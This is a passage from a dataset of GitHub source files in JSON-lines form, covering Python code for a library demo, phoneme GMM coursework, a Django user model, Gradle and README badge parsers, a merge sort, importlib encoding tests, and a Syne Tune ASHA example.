10)\nlib.addBook(b6, 2)\n\nlib.viewLibrary()\n\nstudent1 = Student('Molly')\nstudent2 = Student('Melanie')\n\nlib.createCard('Molly', 2)\nlib.createCard('Melanie', 3)\n\nlib.takeBook(student1, 'Dive Into Systems')\nlib.takeBook(student1, 'Practical Binary Analysis')\nprint('{} currently owns the following books:'.format(student1.getName()))\nprint(student1.viewBooks())\n\nlib.takeBook(student2, 'Dive Into Systems')\nlib.takeBook(student2, 'OOAD with Applications')\nprint('{} currently owns the following books:'.format(student2.getName()))\nprint(student2.viewBooks())\n\nlib.returnBook(student1, 'Dive Into Systems')\nprint(\"{}'s currently available books: \".format(lib.getName()))\nlib.viewLibrary()\n","repo_name":"Margarita-Harutyunyan/Library_Class","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"204048876","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom print_values import *\nfrom plot_data_all_phonemes import *\nfrom plot_data import *\nimport random\nfrom sklearn.preprocessing import normalize\nfrom get_predictions import *\nfrom plot_gaussians import *\n\n# File that contains the data\ndata_npy_file = 'data/PB_data.npy'\n\n# Loading data from .npy file\ndata = np.load(data_npy_file, allow_pickle=True)\ndata = np.ndarray.tolist(data)\n\n# Make a folder to save the figures\nfigures_folder = os.path.join(os.getcwd(), 'figures')\nif not os.path.exists(figures_folder):\n os.makedirs(figures_folder, exist_ok=True)\n\n# Array that contains the phoneme ID (1-10) of each sample\nphoneme_id = data['phoneme_id']\n# frequencies f1 and f2\nf1 = data['f1']\nf2 = data['f2']\n\n# Initialize array containing f1 & f2, of all phonemes.\nX_full = np.zeros((len(f1), 2))\n#########################################\n# Write your code here\n# Store f1 in the first column of X_full, and f2 in the second column of X_full\nX_full[:, 0] = f1\nX_full[:, 1] = f2\n########################################/\nX_full = X_full.astype(np.float32)\n\n# number of GMM components\nk = 6\n\n#########################################\n# Write your code here\n\n# Create an array named \"X_phonemes_1_2\", containing only samples that belong to phoneme 1 and samples that belong to\n# phoneme 2. The shape of X_phonemes_1_2 will be two-dimensional. Each row will represent a sample of the dataset,\n# and each column will represent a feature (e.g. f1 or f2) Fill X_phonemes_1_2 with the samples of X_full that belong\n# to the chosen phonemes To fill X_phonemes_1_2, you can leverage the phoneme_id array, that contains the ID of each\n# sample of X_full\n\nX_phonemes_1_2 = X_full[np.logical_or(phoneme_id == 1, phoneme_id == 2), :]\n\n########################################/\n\n# as dataset X, we will use only the samples of phoneme 1 and 2\nX = X_phonemes_1_2.copy()\n\nmin_f1 = int(np.min(X[:,0]))\nmax_f1 = int(np.max(X[:,0]))\nmin_f2 = int(np.min(X[:,1]))\nmax_f2 = int(np.max(X[:,1]))\nN_f1 = max_f1 - min_f1\nN_f2 = max_f2 - min_f2\nprint('f1 range: {}-{} | {} points'.format(min_f1, max_f1, N_f1))\nprint('f2 range: {}-{} | {} points'.format(min_f2, max_f2, N_f2))\n\n#########################################\n# Write your code here\n\n# Create a custom grid of shape N_f1 x N_f2 The grid will span all the values of (f1, f2) pairs, between [min_f1,\n# max_f1] on f1 axis, and between [min_f2, max_f2] on f2 axis Then, classify each point [i.e., each (f1, f2) pair] of\n# that grid, to either phoneme 1, or phoneme 2, using the two trained GMMs Do predictions, using GMM trained on\n# phoneme 1, on custom grid Do predictions, using GMM trained on phoneme 2, on custom grid Compare these predictions,\n# to classify each point of the grid Store these prediction in a 2D numpy array named \"M\", of shape N_f2 x N_f1 (the\n# first dimension is f2 so that we keep f2 in the vertical axis of the plot) M should contain \"0.0\" in the points\n# that belong to phoneme 1 and \"1.0\" in the points that belong to phoneme 2 #######################################/\n# Generate grid\nax_f1 = np.linspace(min_f1, max_f1, N_f1)\nax_f2 = np.linspace(min_f2, max_f2, N_f2)\nx_axis, y_axis = np.meshgrid(ax_f1, ax_f2)\nsamples = np.stack((x_axis.flatten(), y_axis.flatten())).transpose()\n\n# Phoneme model no. 1\nphoneme_model_1 = 'data/GMM_params_phoneme_{:02}_k_{:02}.npy'.format(1, k)\nparams_1 = np.load(phoneme_model_1, allow_pickle=True)\nparams_1 = np.ndarray.tolist(params_1)\ncopy = samples.copy()\nZ_1 = get_predictions(\n params_1['mu'],\n params_1['s'],\n params_1['p'],\n copy\n)\n\n# Phoneme model no. 2\nphoneme_model_2 = 'data/GMM_params_phoneme_{:02}_k_{:02}.npy'.format(2, k)\nparams_2 = np.load(phoneme_model_2, allow_pickle=True)\nparams_2 = np.ndarray.tolist(params_2)\nZ_2 = get_predictions(\n params_2['mu'],\n params_2['s'],\n params_2['p'],\n copy\n)\n\n# Get the predictions\npred_1 = Z_1.sum(axis=1)\npred_2 = Z_2.sum(axis=1)\npredictions = np.ones(len(copy)) * 2\npredictions[pred_1 >= pred_2] = 1\n\n# M\nM = predictions.reshape(N_f2, N_f1)\n################################################\n# Visualize predictions on custom grid\n\n# Create a figure\n#fig = plt.figure()\nfig, ax = plt.subplots()\n\n# use aspect='auto' (default is 'equal'), to force the plotted image to be square, when dimensions are unequal\nplt.imshow(M, aspect='auto')\n\n# set label of x axis\nax.set_xlabel('f1')\n# set label of y axis\nax.set_ylabel('f2')\n\n# set limits of axes\nplt.xlim((0, N_f1))\nplt.ylim((0, N_f2))\n\n# set range and strings of ticks on axes\nx_range = np.arange(0, N_f1, step=50)\nx_strings = [str(x+min_f1) for x in x_range]\nplt.xticks(x_range, x_strings)\ny_range = np.arange(0, N_f2, step=200)\ny_strings = [str(y+min_f2) for y in y_range]\nplt.yticks(y_range, y_strings)\n\n# set title of figure\ntitle_string = 'Predictions on custom grid'\nplt.title(title_string)\n\n# add a colorbar\nplt.colorbar()\n\n# N_samples = int(X.shape[0]/2)\n# plt.scatter(X[:N_samples, 0] - min_f1, X[:N_samples, 1] - min_f2, marker='.', color='red', label='Phoneme 1')\n# plt.scatter(X[N_samples:, 0] - min_f1, X[N_samples:, 1] - min_f2, marker='.', color='green', label='Phoneme 2')\n\nids = phoneme_id[np.isin(phoneme_id, [1, 2])]\nX1 = X[ids == 1]\nX2 = X[ids == 2]\nplt.scatter(X1[:, 0] - min_f1, X1[:, 1] - min_f2, marker='.', color='red', label='Phoneme 1')\nplt.scatter(X2[:, 0] - min_f1, X2[:, 1] - min_f2, marker='.', color='green', label='Phoneme 2')\n\n\n# add legend to the subplot\nplt.legend()\n\n# save the plotted points of the chosen phoneme, as a figure\nplot_filename = os.path.join(os.getcwd(), 'figures', 'GMM_predictions_on_grid.png')\nplt.savefig(plot_filename)\n\n################################################\n# enter non-interactive mode of matplotlib, to keep figures open\nplt.ioff()\nplt.show()","repo_name":"mughees-asif/postgraduate-artificial-intelligence","sub_path":"Semester A/Machine Learning/projects/project2/assgn_2/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":5790,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"38746005872","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.utils.text import slugify \nfrom django.urls import reverse\n\n# Create your models here.\n\n\nclass CustomUser(AbstractUser):\n slug = models.SlugField(max_length=200, unique=True, null=True)\n phone = models.CharField(verbose_name='telefon raqamingiz', max_length=255, blank=True)\n telegram = models.URLField(verbose_name='telegram URL', blank=True)\n image = models.ImageField(verbose_name='foto surat', upload_to='accounts/', blank=True)\n \n REGIONS = (\n ('Tashkent', 'Tashkent'),\n ('Andijan', 'Andijan'),\n ('Bukhara', 'Bukhara'),\n ('Fergana', 'Fergana'),\n ('Jizzakh', 'Jizzakh'),\n ('Xorazm', 'Xorazm'),\n ('Namangan', 'Namangan'),\n ('Navoiy', 'Navoiy'),\n ('Qashqadaryo', 'Qashqadaryo'),\n ('Samarkand', 'Samarkand'),\n ('Surxondaryo', 'Surxondaryo'),\n ('Karakalpakstan', 'Karakalpakstan'),\n )\n \n region = models.CharField(verbose_name='shahar yoki viloyatingizni tanlang',\n max_length=255,\n choices=REGIONS,\n default='Tashkent')\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.username)\n super(CustomUser, self).save(*args, **kwargs)\n\n def __str__(self):\n return self.username\n \n def get_absolute_url(self):\n return reverse('account_detail', args=[str(self.slug)])\n \n class Meta:\n ordering = ('username',)\n verbose_name = 'User'\n verbose_name_plural = 'Foydalanuvchilar 👨‍👨‍👧‍👦'\n","repo_name":"Rustam-Z/eightsoft-hackathon-dgu","sub_path":"accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6686806311","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Tag\nfrom typing import List\n\n\nclass GradleParser:\n \"\"\"\n This is an extremely simple and dumb Gradle build file parser.\n It does not actually understands the semantics of the Gradle file, but\n rather treats it as a simple text file and extracts out parts of it using\n some simple regexps.\n\n Currently only parses dependencies.\n \"\"\"\n def __init__(self, content: str):\n self.content = content\n self._parse_dependencies(self.content)\n\n def _parse_dependencies(self, content):\n lines = content.lower().split('\\n')\n self.dependencies = []\n\n for l in lines:\n l = l.lstrip()\n # Search for lines with 'compile' or 'testCompile'\n # See: https://docs.gradle.org/current/userguide/artifact_dependencies_tutorial.html\n if l.startswith('compile') or l.startswith('testcompile'):\n package = re.findall(r\"['\\\"]([^'\\\"]+)['\\\"]\", l)\n\n if len(package) > 1:\n # Long format - eg:\n # compile group: 'org.ocpsoft.prettytime', name: 'prettytime-nlp', version: '4.0.0.Final'\n name = package[1]\n else:\n # Short format - eg:\n # compile \"com.fasterxml.jackson.core:jackson-databind:$jacksonVersion\"\n try:\n name = package[0].split(':')[1]\n except IndexError:\n continue\n self.dependencies.append(name)\n\n\nclass ReadmeParser:\n codacy_prefix = 'https://api.codacy.com/project/badge/'\n travis_prefix = 'https://travis-ci.org/'\n coveralls_prefix = 'https://coveralls.io/repos/github/'\n src_attr = 'data-canonical-src'\n\n def __init__(self, content: str):\n self.content = content\n self.soup = BeautifulSoup(content, \"html.parser\")\n\n def img_tags(self, prefix=None) -> List[Tag]:\n tags = self.soup.select('img[{}]'.format(self.src_attr))\n if prefix:\n return [t for t in tags if t[self.src_attr].startswith(prefix)]\n return tags\n\n @property\n def images(self):\n img = self.soup.find_all(src=re.compile(r'\\.(png|jpe?g|gif)$', flags=re.I))\n return [i['src'] for i in img]\n\n @property\n def codacy_grade(self):\n for img in self.img_tags(self.codacy_prefix):\n r = requests.get(img[self.src_attr])\n soup = BeautifulSoup(r.text, 'html.parser')\n for text in soup.find_all('text'):\n if len(text.text.strip()) == 1:\n return text.text.strip()\n\n @property\n def coveralls_grade(self):\n for img in self.img_tags(self.coveralls_prefix):\n # Coveralls URL are in the form of\n # https://s3.amazonaws.com/assets.coveralls.io/badges/coveralls_83.svg\n # We need to parse out the '83' here\n r = requests.get(img[self.src_attr])\n return int(re.search(r'(\\d{1,2})\\.svg', r.url).group(1))\n\n @property\n def travis_status(self):\n for img in self.img_tags(self.travis_prefix):\n r = requests.get(img[self.src_attr])\n soup = BeautifulSoup(r.text, 'html.parser')\n for text in soup.find_all('text'):\n if text.text.strip() != 'build':\n return text.text.strip()\n\n @property\n def title(self):\n h1 = self.soup.find('h1')\n if h1:\n return h1.text.strip()\n return ''\n","repo_name":"ZhangYiJiang/cs2103-stats","sub_path":"parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"15489048591","text":"caderno_infos = {\n 'img': '/static/img/Caderno Turquesa Tilibra.jpg',\n 'titulo': 'Caderno espiral capa plástica sem pauta 1/4 80 folhas Neon Azul Turquesa Tilibra',\n 'preco': '18,91',\n 'marca': 'tilibra',\n 'cor': 'Turquesa',\n}\nbolsa_infos = {\n 'img': '/static/img/bolsa de couro.jpg',\n 'titulo': 'Bolsa de Couro Legítimo com alça trançada caramelo',\n 'preco': '215,99',\n 'marca': 'ARZON',\n 'cor': 'Caramelo',\n}\n\ncadeira_infos = {\n 'img': '/static/img/cadeira de madeira.jpg',\n 'titulo': 'Cadeira Texas de Madeira para Cozinha',\n 'preco': '289,99',\n 'marca': '--',\n 'cor': 'Amêndoa',\n}\n\ncadeira_gamer_infos = {\n 'img': '/static/img/cadeira gamer verde.jpg',\n 'titulo': 'Cadeira Gamer Xzone CGR-01-GR',\n 'preco': '1.089,90',\n 'marca': 'XZONE',\n 'cor': 'Preto / Verde',\n}\n\nventilador_infos = {\n 'img': '/static/img/ventilador.jpg',\n 'titulo': 'Ventilador Mondial, Turbo 8 pás - 40cm, 220V, Preto/Prata, 140W - VTX-40-8P',\n 'preco': '207,69',\n 'marca': 'Mondial',\n 'cor': 'Preto / Prata',\n}\n\npanela_infos = {\n 'img': '/static/img/panela.jpg',\n 'titulo': 'Panela Tramontina Turim em Alumínio com Revestimento Interno e Externo em Antiaderente Starflon Max Vermelha 16 cm 1,4 L',\n 'preco': '76,63',\n 'marca': 'Tramontina',\n 'cor': 'Vermelho / Prata',\n}\n\nescova_infos = {\n 'img': '/static/img/escova de cabelo.jpg',\n 'titulo': 'Escova para Cabelo Ricca - Almofadada Oval',\n 'preco': '15,67',\n 'marca': 'Ricca',\n 'cor': 'Roxo',\n}\n\ntenis_infos = {\n 'img': '/static/img/tenis all stars.jpg',\n 'titulo': 'Tenis Converse Chuck Taylor All Star',\n 'preco': '249,99',\n 'marca': 'All Stars',\n 'cor': 'Preto',\n}\n\ncamisa_infos = {\n 'img': '/static/img/Camisa social masculina.jpg',\n 'titulo': 'Camisa Social Masculina Preta',\n 'preco': '109,90',\n 'marca': \"Kelvy'S\",\n 'cor': 'Preta',\n}\n\nbola_infos = {\n 'img': '/static/img/bola de futebol.jpg',\n 'titulo': 'Bola de Futebol Semiprofissional Preto com Branco',\n 'preco': '74,90',\n 'marca': 'BBR Toys',\n 'cor': 'Preto com Branco',\n}\n\n\ndb = {\n 'caderno': caderno_infos,\n 'bolsa': bolsa_infos,\n 'cadeira': cadeira_infos,\n 'cadeira_gamer': cadeira_gamer_infos,\n 'ventilador': ventilador_infos,\n 'panela': panela_infos,\n 'escova': escova_infos,\n 'tenis': tenis_infos,\n 'camisa': camisa_infos,\n 'bola': bola_infos,\n}","repo_name":"Evy8882/Mercado-fict-cio","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13916496042","text":"#!/usr/bin/env python\n#--------------------------------------------------------------------------\n#sort.py\n#\n#sorting a list of integers in Python\n#\n# Date: 20-05-2013\n# Tested with Python3\n# TO RUN:\n# sudo chmod a+x sort.py\n# ./sort.py\n# OR JUST RUN : python3 sort.py\n#\n# @Author: Dlo Jiwan Bagari\n# @id 114702261\n# ---------------------------------------------------------------------------\nfrom sys import exit\nfrom random import randint\ndef get_list():\n #get user input and convert it to a list of numbers\n try:\n numbers = input()\n return [int(item) for item in numbers.strip().split()]\n except ValueError:\n exit()\n\na = [randint(1,100000) for _ in range(10000000)]\ndef sort(my_list):\n # sorting the list in place and return it.\n\n # create copy of the orginal list\n alias = my_list[:]\n \n sort_recursion(alias, my_list, 0, len(my_list))\n return my_list\n \ndef sort_recursion(copy, orginal, start, end):\n # sort copy 'list' from range 'start' up to 'end' , and insert the result into 'orginal'\n length = end - start\n # base cases to terminate recursion.\n if length <= 2:\n if length == 2:\n if orginal[start] > orginal[start + 1]:\n # swap values\n orginal[start] , orginal[start + 1] = orginal[start + 1] , orginal[start]\n return\n # find the position of the middle item in the list 'orginal' \n divider = (start + end) //2\n #sort the first half of the list 'orginal' and put the result in the list 'copy'\n sort_recursion(orginal, copy, start, divider)\n #sort the second half of the list 'orginal' and put the result in the list 'copy'\n sort_recursion(orginal, copy, divider, end)\n # inserting the items by order from first half and the second half of the list 'copy' into list 'orginal\n left = start\n right = divider\n position = start\n while position < end:\n if right == end or ( left < divider and copy[left] < copy[right]):\n orginal[position] = copy[left]\n left += 1\n else:\n orginal[position] = copy[right]\n right += 1\n position += 1\n\n\nsort([randint(1,10000000) for _ in range(100000)])\n","repo_name":"DloBagari/python_scripts","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39097634602","text":"import os\nfrom textwrap import dedent\nfrom typing import Union\n\nfrom ....core.main import Step\nfrom ....core.sdk import ContinueSDK\nfrom ....models.filesystem_edit import AddDirectory, AddFile\n\n\nclass WritePytestsRecipe(Step):\n for_filepath: Union[str, None] = None\n user_input: str = \"Write unit tests for this file.\"\n\n async def describe(self, models):\n return f\"Writing unit tests for {self.for_filepath}\"\n\n async def run(self, sdk: ContinueSDK):\n if self.for_filepath is None:\n self.for_filepath = (await sdk.ide.getVisibleFiles())[0]\n\n filename = os.path.basename(self.for_filepath)\n dirname = os.path.dirname(self.for_filepath)\n\n path_dir = os.path.join(dirname, \"tests\")\n if not os.path.exists(path_dir):\n await sdk.apply_filesystem_edit(AddDirectory(path=path_dir))\n\n path = os.path.join(path_dir, f\"test_{filename}\")\n if os.path.exists(path):\n return None\n\n for_file_contents = await sdk.ide.readFile(self.for_filepath)\n\n prompt = dedent(\n f\"\"\"\\\n This is the file you will write unit tests for:\n\n ```python\n {for_file_contents}\n ```\n\n Here are additional instructions:\n\n \"{self.user_input}\"\n\n Here is a complete set of pytest unit tests:\"\"\"\n )\n tests = await sdk.models.medium.complete(prompt)\n\n await sdk.apply_filesystem_edit(AddFile(filepath=path, content=tests))\n\n return None\n","repo_name":"continuedev/continue","sub_path":"continuedev/src/continuedev/plugins/recipes/WritePytestsRecipe/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":5185,"dataset":"github-code","pt":"67"} +{"seq_id":"4391838261","text":"# https://www.acmicpc.net/problem/18869\n\ndef solve():\n import sys\n from collections import defaultdict\n M, N = map(int, sys.stdin.readline().split())\n universe = []\n # for _ in range(M):\n # temp = list(map(int, sys.stdin.readline().split()))\n # temp = [(idx, val) for idx, val in enumerate(temp)]\n # temp.sort(key=lambda x:x[1])\n # temp = [idx for idx, val in temp]\n # universe.append(','.join(map(str, temp)))\n \n uni_dict = defaultdict(int)\n for _ in range(M):\n temp = list(map(int, sys.stdin.readline().split()))\n s_temp = sorted(set(temp))\n temp_dict = dict()\n str_uni = ''\n for i in range(len(s_temp)):\n temp_dict[s_temp[i]] = i\n for te in temp:\n str_uni += str(temp_dict[te])\n uni_dict[str_uni] += 1\n \n result = 0\n for i in uni_dict.values():\n result += (i * (i - 1)) // 2\n \n print(result)\n\nif __name__ == \"__main__\":\n solve()","repo_name":"Carrotww/Carrot_Algorithm","sub_path":"2023/23_06/2023_06_10_ 백준_멀티버스2--resolve.py","file_name":"2023_06_10_ 백준_멀티버스2--resolve.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41751155511","text":"from django.conf.urls.defaults import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nfrom django.views.generic.simple import direct_to_template\nfrom django.views.generic.list_detail import object_list\nfrom django.views.generic.list_detail import object_detail\nfrom vinovoter.models import WineBottle\nadmin.autodiscover()\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'vinovote.views.home', name='home'),\n # url(r'^vinovote/', include('vinovote.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n url(r'^vote/$','vinovoter.views.vote_lookup'),\n url(r'^taster/register/$','vinovoter.views.personreg'),\n url(r'^taster/(?P\\d+)/winereg/$','vinovoter.views.winereg'),\n url(r'^taster/(?P\\d+)/winereg/(?P\\w+)/$','vinovoter.views.wineregcomplete'),\n url(r'^taster/(?P\\d+)/vote/$','vinovoter.views.vote'),\n #url(r'^taster/\\d+/winereg/$','vinovoter.views.winereg'),\n url(r'^json/wineinfo/','vinovoter.views.winejson'),\n url(r'^json/regioninfo/','vinovoter.views.regionjson'),\n url(r'^$',direct_to_template, {'template': 'index.html'}),\n url(r'^thanks/$',direct_to_template, {'template': 'thanks.html'}),\n url(r'^error/dupvote/$',direct_to_template, {'template': 'dupvote.html'}),\n url(r'^results/$','vinovoter.views.results' ),\n url(r'^results/all/$',object_list,{'queryset':WineBottle.objects.all().order_by('winenum'),'template_name':'winebottle_list.html'} ),\n url(r'^results/(?P\\d+)/$',object_detail,{'queryset': WineBottle.objects.all(),'template_name':'winebottle_object.html'} ),\n)\n","repo_name":"mattva01/vinovote","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"22233190697","text":"from . import util as source_util\n\nfrom importlib import _bootstrap\nimport codecs\nimport re\nimport sys\n# Because sys.path gets essentially blanked, need to have unicodedata already\n# imported for the parser to use.\nimport unicodedata\nimport unittest\n\n\nCODING_RE = re.compile(r'^[ \\t\\f]*#.*coding[:=][ \\t]*([-\\w.]+)', re.ASCII)\n\n\nclass EncodingTest(unittest.TestCase):\n\n \"\"\"PEP 3120 makes UTF-8 the default encoding for source code\n [default encoding].\n\n PEP 263 specifies how that can change on a per-file basis. Either the first\n or second line can contain the encoding line [encoding first line]\n encoding second line]. If the file has the BOM marker it is considered UTF-8\n implicitly [BOM]. If any encoding is specified it must be UTF-8, else it is\n an error [BOM and utf-8][BOM conflict].\n\n \"\"\"\n\n variable = '\\u00fc'\n character = '\\u00c9'\n source_line = \"{0} = '{1}'\\n\".format(variable, character)\n module_name = '_temp'\n\n def run_test(self, source):\n with source_util.create_modules(self.module_name) as mapping:\n with open(mapping[self.module_name], 'wb') as file:\n file.write(source)\n loader = _bootstrap.SourceFileLoader(self.module_name,\n mapping[self.module_name])\n return loader.load_module(self.module_name)\n\n def create_source(self, encoding):\n encoding_line = \"# coding={0}\".format(encoding)\n assert CODING_RE.match(encoding_line)\n source_lines = [encoding_line.encode('utf-8')]\n source_lines.append(self.source_line.encode(encoding))\n return b'\\n'.join(source_lines)\n\n def test_non_obvious_encoding(self):\n # Make sure that an encoding that has never been a standard one for\n # Python works.\n encoding_line = \"# coding=koi8-r\"\n assert CODING_RE.match(encoding_line)\n source = \"{0}\\na=42\\n\".format(encoding_line).encode(\"koi8-r\")\n self.run_test(source)\n\n # [default encoding]\n def test_default_encoding(self):\n self.run_test(self.source_line.encode('utf-8'))\n\n # [encoding first line]\n def test_encoding_on_first_line(self):\n encoding = 'Latin-1'\n source = self.create_source(encoding)\n self.run_test(source)\n\n # [encoding second line]\n def test_encoding_on_second_line(self):\n source = b\"#/usr/bin/python\\n\" + self.create_source('Latin-1')\n self.run_test(source)\n\n # [BOM]\n def test_bom(self):\n self.run_test(codecs.BOM_UTF8 + self.source_line.encode('utf-8'))\n\n # [BOM and utf-8]\n def test_bom_and_utf_8(self):\n source = codecs.BOM_UTF8 + self.create_source('utf-8')\n self.run_test(source)\n\n # [BOM conflict]\n def test_bom_conflict(self):\n source = codecs.BOM_UTF8 + self.create_source('latin-1')\n with self.assertRaises(SyntaxError):\n self.run_test(source)\n\n\nclass LineEndingTest(unittest.TestCase):\n\n r\"\"\"Source written with the three types of line endings (\\n, \\r\\n, \\r)\n need to be readable [cr][crlf][lf].\"\"\"\n\n def run_test(self, line_ending):\n module_name = '_temp'\n source_lines = [b\"a = 42\", b\"b = -13\", b'']\n source = line_ending.join(source_lines)\n with source_util.create_modules(module_name) as mapping:\n with open(mapping[module_name], 'wb') as file:\n file.write(source)\n loader = _bootstrap.SourceFileLoader(module_name,\n mapping[module_name])\n return loader.load_module(module_name)\n\n # [cr]\n def test_cr(self):\n self.run_test(b'\\r')\n\n # [crlf]\n def test_crlf(self):\n self.run_test(b'\\r\\n')\n\n # [lf]\n def test_lf(self):\n self.run_test(b'\\n')\n\n\ndef test_main():\n from test.support import run_unittest\n run_unittest(EncodingTest, LineEndingTest)\n\n\nif __name__ == '__main__':\n test_main()\n","repo_name":"pyparallel/pyparallel","sub_path":"Lib/test/test_importlib/source/test_source_encoding.py","file_name":"test_source_encoding.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":579,"dataset":"github-code","pt":"67"} +{"seq_id":"14647457806","text":"# 4. Convert the given time into hour/minute/seconds.\n# (The input is taken as second = 8523 - hh: mm: ss)\n# int S = seconds % 60\n# int H = seconds / 60\n# int M = H % 60\n# H = H / 60\n\n\ns = int(input(\"Enter the Time in Seconds: \"))\n\nsec = s % 60\nh = s / 60\nm = h % 60\nh = h / 60\n\nprint(int(h), \":\", int(m), \":\", int(sec))\n","repo_name":"MIG58/Python3-College","sub_path":"Lab2/Convert_HH-MM-SS.py","file_name":"Convert_HH-MM-SS.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12722574513","text":"import logging\nfrom dataclasses import dataclass\n\nfrom syne_tune.blackbox_repository import BlackboxRepositoryBackend\nfrom syne_tune.backend.simulator_backend.simulator_callback import SimulatorCallback\nfrom syne_tune.experiments import load_experiment\nfrom syne_tune.optimizer.baselines import ASHA\nfrom syne_tune import Tuner, StoppingCriterion\nfrom syne_tune.config_space import Domain\nfrom syne_tune.try_import import try_import_visual_message\n\ntry:\n import matplotlib.pyplot as plt\nexcept ImportError:\n print(try_import_visual_message())\n\n\ndef plot_yahpo_learning_curves(\n trial_backend, benchmark: str, time_col: str, metric_col: str\n):\n bb = trial_backend.blackbox\n plt.figure()\n plt.title(\n f\"Learning curves from Yahpo {benchmark} for 10 different hyperparameters.\"\n )\n for i in range(10):\n config = {\n k: v.sample() if isinstance(v, Domain) else v\n for k, v in bb.configuration_space.items()\n }\n evals = bb(config)\n time_index = next(\n i for i, name in enumerate(bb.objectives_names) if name == time_col\n )\n accuracy_index = next(\n i for i, name in enumerate(bb.objectives_names) if name == metric_col\n )\n import numpy as np\n\n if np.diff(evals[:, time_index]).min() < 0:\n print(\"negative time between two different steps...\")\n plt.plot(evals[:, time_index], evals[:, accuracy_index])\n plt.xlabel(time_col)\n plt.ylabel(metric_col)\n plt.show()\n\n\n@dataclass\nclass BenchmarkInfo:\n blackbox_name: str\n elapsed_time_attr: str\n metric: str\n dataset: str\n mode: str\n max_t: int\n resource_attr: str\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n benchmark_infos = {\n \"nb301\": BenchmarkInfo(\n elapsed_time_attr=\"runtime\",\n metric=\"val_accuracy\",\n blackbox_name=\"yahpo-nb301\",\n dataset=\"CIFAR10\",\n mode=\"max\",\n max_t=97,\n resource_attr=\"epoch\",\n ),\n \"lcbench\": BenchmarkInfo(\n elapsed_time_attr=\"time\",\n metric=\"val_accuracy\",\n blackbox_name=\"yahpo-lcbench\",\n dataset=\"3945\",\n mode=\"max\",\n max_t=51,\n resource_attr=\"epoch\",\n ),\n \"fcnet\": BenchmarkInfo(\n elapsed_time_attr=\"runtime\",\n metric=\"valid_mse\",\n blackbox_name=\"yahpo-fcnet\",\n dataset=\"fcnet_naval_propulsion\",\n mode=\"min\",\n max_t=99,\n resource_attr=\"epoch\",\n ),\n }\n for benchmark in [\"nb301\", \"lcbench\", \"fcnet\"]:\n benchmark_info = benchmark_infos[benchmark]\n\n trial_backend = BlackboxRepositoryBackend(\n blackbox_name=benchmark_info.blackbox_name,\n elapsed_time_attr=benchmark_info.elapsed_time_attr,\n dataset=benchmark_info.dataset,\n )\n\n plot_yahpo_learning_curves(\n trial_backend,\n benchmark=benchmark,\n time_col=benchmark_info.elapsed_time_attr,\n metric_col=benchmark_info.metric,\n )\n\n max_resource_attr = \"epochs\"\n config_space = dict(\n trial_backend.blackbox.configuration_space,\n **{max_resource_attr: benchmark_info.max_t},\n )\n scheduler = ASHA(\n config_space=config_space,\n max_resource_attr=max_resource_attr,\n resource_attr=benchmark_info.resource_attr,\n mode=benchmark_info.mode,\n metric=benchmark_info.metric,\n )\n\n stop_criterion = StoppingCriterion(max_num_trials_started=100)\n\n # It is important to set ``sleep_time`` to 0 here (mandatory for simulator\n # backend)\n tuner = Tuner(\n trial_backend=trial_backend,\n scheduler=scheduler,\n stop_criterion=stop_criterion,\n n_workers=4,\n sleep_time=0,\n print_update_interval=10,\n # This callback is required in order to make things work with the\n # simulator callback. It makes sure that results are stored with\n # simulated time (rather than real time), and that the time_keeper\n # is advanced properly whenever the tuner loop sleeps\n callbacks=[SimulatorCallback()],\n tuner_name=f\"ASHA-Yahpo-{benchmark}\",\n )\n tuner.run()\n\n tuning_experiment = load_experiment(tuner.name)\n tuning_experiment.plot()\n","repo_name":"awslabs/syne-tune","sub_path":"examples/launch_asha_yahpo.py","file_name":"launch_asha_yahpo.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"67"} +{"seq_id":"9541921342","text":"\nimport sys\nimport os\n\n# This file controls parallel shell code files.\ndef main():\n\tif sys.argv[1] == '-c': # copy file argv[2] to file argv[3]\n\t\twith open(sys.argv[2], 'r') as in_file: # Read a dimacs file\n\t\t\tin_content = in_file.readlines()\n\t\twith open(sys.argv[3], 'w') as out_file:\n\t\t\tfor line in 